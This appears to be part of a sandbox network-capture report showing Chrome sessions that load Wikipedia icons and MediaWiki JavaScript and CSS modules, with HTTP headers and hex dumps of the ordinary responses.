                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC2734INData Raw: 00 00 01 00 03 00 30 30 10 00 01 00 04 00 68 06 00 00 36 00 00 00 20 20 10 00 01 00 04 00 e8 02 00 00 9e 06 00 00 10 10 10 00 01 00 04 00 28 01 00 00 86 09 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 04 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 01 01 01 00 17 17 17 00 30 30 30 00 47 47 47 00 58 58 58 00 67 67 67 00 76 76 76 00 87 87 87 00 95 95 95 00 a9 a9 a9 00 b7 b7 b7 00 c7 c7 c7 00 d7 d7 d7 00 e8 e8 e8 00 fe fe fe 00 00 00 00 00 ff ff ff fe ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ef ff ff ff ff ff ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ff ff ff fe ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ef ff ff ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ee ff fe
                                                                                                                                                                                                                                      Data Ascii: 00h6 ((0`000GGGXXXgggvvv


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      74192.168.2.1649802185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC673OUTGET /w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&version=1kwga HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC1101INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 07:31:24 GMT
                                                                                                                                                                                                                                      etag: W/"1kwga"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 08:11:56 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&sourcemap=1&version=1kwga
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/202852
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 15145
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC13694INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 6d 77 2e 63 6f 6e 66 69 67 2e 76 61 6c 75 65 73 2e 77 62 43 75 72 72 65 6e 74 53 69 74 65 44 65 74 61 69 6c 73 40 6c 6e 32 39 64 22 2c 66 75 6e 63 74 69 6f 6e 28 24 2c 6a 51 75 65 72 79 2c 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 29 7b 6d 77 2e 63 6f 6e 66 69 67 2e 73 65 74 28 7b 22 77 62 43 75 72 72 65 6e 74 53 69 74 65 44 65 74 61 69 6c 73 22 3a 7b 22 73 68 6f 72 74 4e 61 6d 65 22 3a 22 45 6e 67 6c 69 73 68 22 2c 22 6e 61 6d 65 22 3a 22 45 6e 67 6c 69 73 68 22 2c 22 69 64 22 3a 22 65 6e 77 69 6b 69 22 2c 22 70 61 67 65 55 72 6c 22 3a 22 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 69 6b 69 2f 24 31 22 2c 22 61 70 69 55 72 6c 22 3a 22 2f
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["mw.config.values.wbCurrentSiteDetails@ln29d",function($,jQuery,require,module){mw.config.set({"wbCurrentSiteDetails":{"shortName":"English","name":"English","id":"enwiki","pageUrl":"//en.wikipedia.org/wiki/$1","apiUrl":"/
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC1451INData Raw: 7a 25 32 32 2f 25 33 45 25 33 43 2f 67 25 33 45 25 33 43 2f 73 76 67 25 33 45 5c 22 29 7d 2e 6f 6f 2d 75 69 2d 69 6d 61 67 65 2d 70 72 6f 67 72 65 73 73 69 76 65 2e 6f 6f 2d 75 69 2d 69 63 6f 6e 2d 72 65 64 6f 2c 2e 6d 77 2d 75 69 2d 69 63 6f 6e 2d 72 65 64 6f 2d 70 72 6f 67 72 65 73 73 69 76 65 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 5c 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 25 32 32 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 25 32 32 20 77 69 64 74 68 3d 25 32 32 32 30 25 32 32 20 68 65 69 67 68 74 3d 25 32 32 32 30 25 32 32 20 76 69 65 77 42 6f 78 3d 25 32 32 30 20 30 20 32 30 20 32 30 25 32 32 25 33 45 25 33 43
                                                                                                                                                                                                                                      Data Ascii: z%22/%3E%3C/g%3E%3C/svg%3E\")}.oo-ui-image-progressive.oo-ui-icon-redo,.mw-ui-icon-redo-progressive:before{background-image:url(\"data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22 width=%2220%22 height=%2220%22 viewBox=%220 0 20 20%22%3E%3C


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      75192.168.2.1649804185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC632OUTGET /wiki/Special:CentralAutoLogin/checkLoggedIn?useformat=desktop&wikiid=enwiki&type=script&wikiid=enwiki&type=script HTTP/1.1
                                                                                                                                                                                                                                      Host: login.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC1196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:43:54 GMT
                                                                                                                                                                                                                                      server: mw-web.codfw.main-ddbb68945-pn2k5
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      accept-ch:
                                                                                                                                                                                                                                      vary: Accept-Encoding,Cookie,Authorization
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      age: 541
                                                                                                                                                                                                                                      x-cache: cp3072 miss, cp3072 hit/5240
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      set-cookie: WMF-Last-Access=07-Jan-2025;Path=/;HttpOnly;secure;Expires=Sat, 08 Feb 2025 12:00:00 GMT
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      cache-control: private, s-maxage=0, max-age=0, must-revalidate, no-transform
                                                                                                                                                                                                                                      set-cookie: GeoIP=US:NY:New_York:40.71:-74.01:v4; Path=/; secure; Domain=.wikimedia.org
                                                                                                                                                                                                                                      set-cookie: NetworkProbeLimit=0.001;Path=/;Secure;SameSite=Lax;Max-Age=3600
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 252
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC252INData Raw: 2f 2a 20 4e 6f 74 20 63 65 6e 74 72 61 6c 6c 79 20 6c 6f 67 67 65 64 20 69 6e 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6e 65 77 20 44 61 74 65 28 29 3b 74 2e 73 65 74 54 69 6d 65 28 74 2e 67 65 74 54 69 6d 65 28 29 2b 38 36 34 30 30 30 30 30 29 3b 74 72 79 7b 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 27 43 65 6e 74 72 61 6c 41 75 74 68 41 6e 6f 6e 27 2c 74 2e 67 65 74 54 69 6d 65 28 29 29 3b 7d 63 61 74 63 68 28 65 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 43 65 6e 74 72 61 6c 41 75 74 68 41 6e 6f 6e 3d 31 3b 20 65 78 70 69 72 65 73 3d 27 2b 74 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 63 61 74 63 68 28 65 32 29 7b 7d 7d 7d 28 29 29 3b
                                                                                                                                                                                                                                      Data Ascii: /* Not centrally logged in */(function(){var t=new Date();t.setTime(t.getTime()+86400000);try{localStorage.setItem('CentralAuthAnon',t.getTime());}catch(e){try{document.cookie='CentralAuthAnon=1; expires='+t.toGMTString()+'; path=/';}catch(e2){}}}());


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      76192.168.2.1649805185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC652OUTGET /w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&version=1qfqi HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC1081INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 08:29:28 GMT
                                                                                                                                                                                                                                      etag: W/"1qfqi"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 09:30:51 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&sourcemap=1&version=1qfqi
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/219919
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 122202
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC13714INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 65 78 74 2e 63 69 74 65 2e 72 65 66 65 72 65 6e 63 65 50 72 65 76 69 65 77 73 40 31 30 64 31 63 22 2c 7b 22 6d 61 69 6e 22 3a 22 69 6e 64 65 78 2e 6a 73 22 2c 22 66 69 6c 65 73 22 3a 7b 22 69 6e 64 65 78 2e 6a 73 22 3a 66 75 6e 63 74 69 6f 6e 28 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 29 7b 63 6f 6e 73 74 20 69 73 52 65 66 65 72 65 6e 63 65 50 72 65 76 69 65 77 73 45 6e 61 62 6c 65 64 3d 72 65 71 75 69 72 65 28 27 2e 2f 69 73 52 65 66 65 72 65 6e 63 65 50 72 65 76 69 65 77 73 45 6e 61 62 6c 65 64 2e 6a 73 27 29 3b 63 6f 6e 73 74 7b 69 6e 69 74 52 65 66 65 72 65 6e 63 65 50 72 65 76 69 65 77 73 49 6e 73 74 72 75 6d 65 6e 74 61 74
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["ext.cite.referencePreviews@10d1c",{"main":"index.js","files":{"index.js":function(require,module,exports){const isReferencePreviewsEnabled=require('./isReferencePreviewsEnabled.js');const{initReferencePreviewsInstrumentat
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC16320INData Raw: 5c 22 32 30 5c 5c 5c 22 20 68 65 69 67 68 74 3d 5c 5c 5c 22 32 30 5c 5c 5c 22 20 76 69 65 77 42 6f 78 3d 5c 5c 5c 22 30 20 30 20 32 30 20 32 30 5c 5c 5c 22 20 66 69 6c 6c 3d 5c 5c 5c 22 25 32 33 30 30 30 30 30 30 5c 5c 5c 22 5c 75 30 30 33 45 5c 75 30 30 33 43 70 61 74 68 20 64 3d 5c 5c 5c 22 4d 31 35 20 32 61 37 2e 36 35 20 37 2e 36 35 20 30 20 30 30 2d 35 20 32 20 37 2e 36 35 20 37 2e 36 35 20 30 20 30 30 2d 35 2d 32 48 31 76 31 35 68 34 61 37 2e 36 35 20 37 2e 36 35 20 30 20 30 31 35 20 32 20 37 2e 36 35 20 37 2e 36 35 20 30 20 30 31 35 2d 32 68 34 56 32 7a 6d 32 2e 35 20 31 33 2e 35 48 31 34 61 34 2e 33 38 20 34 2e 33 38 20 30 20 30 30 2d 33 20 31 56 35 73 31 2d 31 2e 35 20 34 2d 31 2e 35 68 32 2e 35 7a 5c 5c 5c 22 2f 5c 75 30 30 33 45 5c 75 30 30 33
                                                                                                                                                                                                                                      Data Ascii: \"20\\\" height=\\\"20\\\" viewBox=\\\"0 0 20 20\\\" fill=\\\"%23000000\\\"\u003E\u003Cpath d=\\\"M15 2a7.65 7.65 0 00-5 2 7.65 7.65 0 00-5-2H1v15h4a7.65 7.65 0 015 2 7.65 7.65 0 015-2h4V2zm2.5 13.5H14a4.38 4.38 0 00-3 1V5s1-1.5 4-1.5h2.5z\\\"/\u003E\u003
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC2734INData Raw: 72 65 74 75 72 6e 20 74 68 65 20 70 72 65 76 69 6f 75 73 20 73 74 61 74 65 2e 20 49 66 20 79 6f 75 20 77 61 6e 74 20 74 68 69 73 20 72 65 64 75 63 65 72 20 74 6f 20 68 6f 6c 64 20 6e 6f 20 76 61 6c 75 65 2c 20 79 6f 75 20 63 61 6e 20 72 65 74 75 72 6e 20 6e 75 6c 6c 20 69 6e 73 74 65 61 64 20 6f 66 20 75 6e 64 65 66 69 6e 65 64 2e 27 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72
                                                                                                                                                                                                                                      Data Ascii: return the previous state. If you want this reducer to hold no value, you can return null instead of undefined.'}function s(e,t){return function(){return t(e.apply(this,arguments))}}function u(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumer
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC16320INData Raw: 74 52 65 64 75 63 65 72 20 74 6f 20 62 65 20 61 20 66 75 6e 63 74 69 6f 6e 2e 22 29 3b 73 3d 65 2c 6d 28 7b 74 79 70 65 3a 69 2e 52 45 50 4c 41 43 45 7d 29 7d 7d 29 5b 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 68 3b 72 65 74 75 72 6e 28 65 3d 7b 73 75 62 73 63 72 69 62 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 7c 7c 6e 75 6c 6c 3d 3d 3d 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 45 78 70 65 63 74 65 64 20 74 68 65 20 6f 62 73 65 72 76 65 72 20 74 6f 20 62 65 20 61 6e 20 6f 62 6a 65 63 74 2e 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 65 2e 6e 65 78 74 26 26 65 2e 6e 65 78 74 28 66 28 29 29 7d 72 65 74 75 72 6e 20 6e 28 29 2c 7b 75 6e 73 75
                                                                                                                                                                                                                                      Data Ascii: tReducer to be a function.");s=e,m({type:i.REPLACE})}})[r]=function(){var e,t=h;return(e={subscribe:function(e){if("object"!=typeof e||null===e)throw new TypeError("Expected the observer to be an object.");function n(){e.next&&e.next(f())}return n(),{unsu
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC16320INData Raw: 73 61 76 65 22 29 2c 68 65 6c 70 54 65 78 74 3a 6d 77 2e 6d 73 67 28 22 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67 73 2d 68 65 6c 70 22 29 2c 6f 6b 4c 61 62 65 6c 3a 6d 77 2e 6d 73 67 28 22 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67 73 2d 68 65 6c 70 2d 6f 6b 22 29 2c 63 68 6f 69 63 65 73 3a 74 7d 29 7d 28 74 29 3b 72 65 74 75 72 6e 20 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 73 61 76 65 22 29 2e 0a 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 73 61 76 65 53 65 74 74 69 6e 67 73 28 41 72 72 61 79 2e 66 72 6f 6d 28 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 6e 70 75 74 22 29 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74
                                                                                                                                                                                                                                      Data Ascii: save"),helpText:mw.msg("popups-settings-help"),okLabel:mw.msg("popups-settings-help-ok"),choices:t})}(t);return n.querySelector(".save").addEventListener("click",(function(){e.saveSettings(Array.from(n.querySelectorAll("input")).reduce((function(e,t){ret
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC128INData Raw: 70 6f 70 75 70 73 2d 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2d 65 6e 61 62 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 75 2e 67 65 74 28 74 29 7d 2c 73 74 6f 72 65 50 72 65 76 69 65 77 54 79 70 65 45 6e 61 62 6c 65 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 6d 77 65 2d 70 6f 70 75 70 73 2d 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2d 65 6e 61 62 6c
                                                                                                                                                                                                                                      Data Ascii: popups-".concat(e,"-enabled");return null===u.get(t)},storePreviewTypeEnabled:function(e,t){var n="mwe-popups-".concat(e,"-enabl
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC16320INData Raw: 65 64 22 29 3b 74 3f 75 2e 72 65 6d 6f 76 65 28 6e 29 3a 75 2e 73 65 74 28 6e 2c 22 30 22 29 2c 6d 77 2e 74 72 61 63 6b 28 22 50 6f 70 75 70 73 2e 53 65 74 74 69 6e 67 43 68 61 6e 67 65 22 2c 7b 70 72 65 76 69 65 77 54 79 70 65 3a 65 2c 61 63 74 69 6f 6e 3a 74 3f 22 61 6e 6f 6e 79 6d 6f 75 73 45 6e 61 62 6c 65 64 22 3a 22 61 6e 6f 6e 79 6d 6f 75 73 44 69 73 61 62 6c 65 64 22 7d 29 7d 7d 29 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 63 7c 7c 28 28 6c 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 6d 77 65 2d 70 6f 70 75 70 73 2d 6f 76 65 72 6c 61 79 22 29 2c 63 3d 73 65 28 65 2c 74 29 29 2c 7b 72 65 66 72 65 73 68 3a 66 75 6e 63 74 69
                                                                                                                                                                                                                                      Data Ascii: ed");t?u.remove(n):u.set(n,"0"),mw.track("Popups.SettingChange",{previewType:e,action:t?"anonymousEnabled":"anonymousDisabled"})}}),g=function(e,t){return c||((l=document.createElement("div")).classList.add("mwe-popups-overlay"),c=se(e,t)),{refresh:functi
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC16320INData Raw: 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 23 6d 77 65 2d 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67 73 20 6d 61 69 6e 23 6d 77 65 2d 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67 73 2d 66 6f 72 6d 20 66 6f 72 6d 20 6c 61 62 65 6c 20 5c 75 30 30 33 45 20 73 70 61 6e 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 65 6d 70 68 61 73 69 7a 65 64 2c 23 31 30 31 34 31 38 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 7d 23 6d 77 65 2d 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67 73 20 6d 61 69 6e 23 6d 77 65 2d 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67
                                                                                                                                                                                                                                      Data Ascii: in-left:10px;flex-direction:column}#mwe-popups-settings main#mwe-popups-settings-form form label \u003E span{color:var(--color-emphasized,#101418);font-size:14px;font-weight:bold;display:block;margin-bottom:5px}#mwe-popups-settings main#mwe-popups-setting
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC128INData Raw: 6e 61 62 6c 65 64 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d 61 63 74 69 6f 6e 2d 70 72 6f 67 72 65 73 73 69 76 65 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 70 72 6f 67 72 65 73 73 69 76 65 2d 73 75 62 74 6c 65 2d 2d 68 6f 76 65 72 2c 23 64 63 65 33 66 39 29 3b 63 6f 6c 6f 72 3a 76 61 72
                                                                                                                                                                                                                                      Data Ascii: nabled.cdx-button--action-progressive:hover{background-color:var(--background-color-progressive-subtle--hover,#dce3f9);color:var
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC16320INData Raw: 28 2d 2d 63 6f 6c 6f 72 2d 70 72 6f 67 72 65 73 73 69 76 65 2d 2d 68 6f 76 65 72 2c 23 33 30 35 36 61 39 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 70 72 6f 67 72 65 73 73 69 76 65 2d 2d 68 6f 76 65 72 2c 23 33 30 35 36 61 39 29 7d 40 73 75 70 70 6f 72 74 73 20 28 28 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 6e 6f 6e 65 29 20 6f 72 20 28 6d 61 73 6b 2d 69 6d 61 67 65 3a 6e 6f 6e 65 29 29 7b 2e 63 64 78 2d 62 75 74 74 6f 6e 3a 65 6e 61 62 6c 65 64 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d 61 63 74 69 6f 6e 2d 70 72 6f 67 72 65 73 73 69 76 65 3a 68 6f 76 65 72 20 2e 63 64 78 2d 62 75 74 74 6f 6e 5f 5f 69 63 6f 6e 2c 2e 63 64 78 2d 62 75 74 74 6f 6e 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d
                                                                                                                                                                                                                                      Data Ascii: (--color-progressive--hover,#3056a9);border-color:var(--border-color-progressive--hover,#3056a9)}@supports ((-webkit-mask-image:none) or (mask-image:none)){.cdx-button:enabled.cdx-button--action-progressive:hover .cdx-button__icon,.cdx-button.cdx-button--


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      77192.168.2.1649806185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
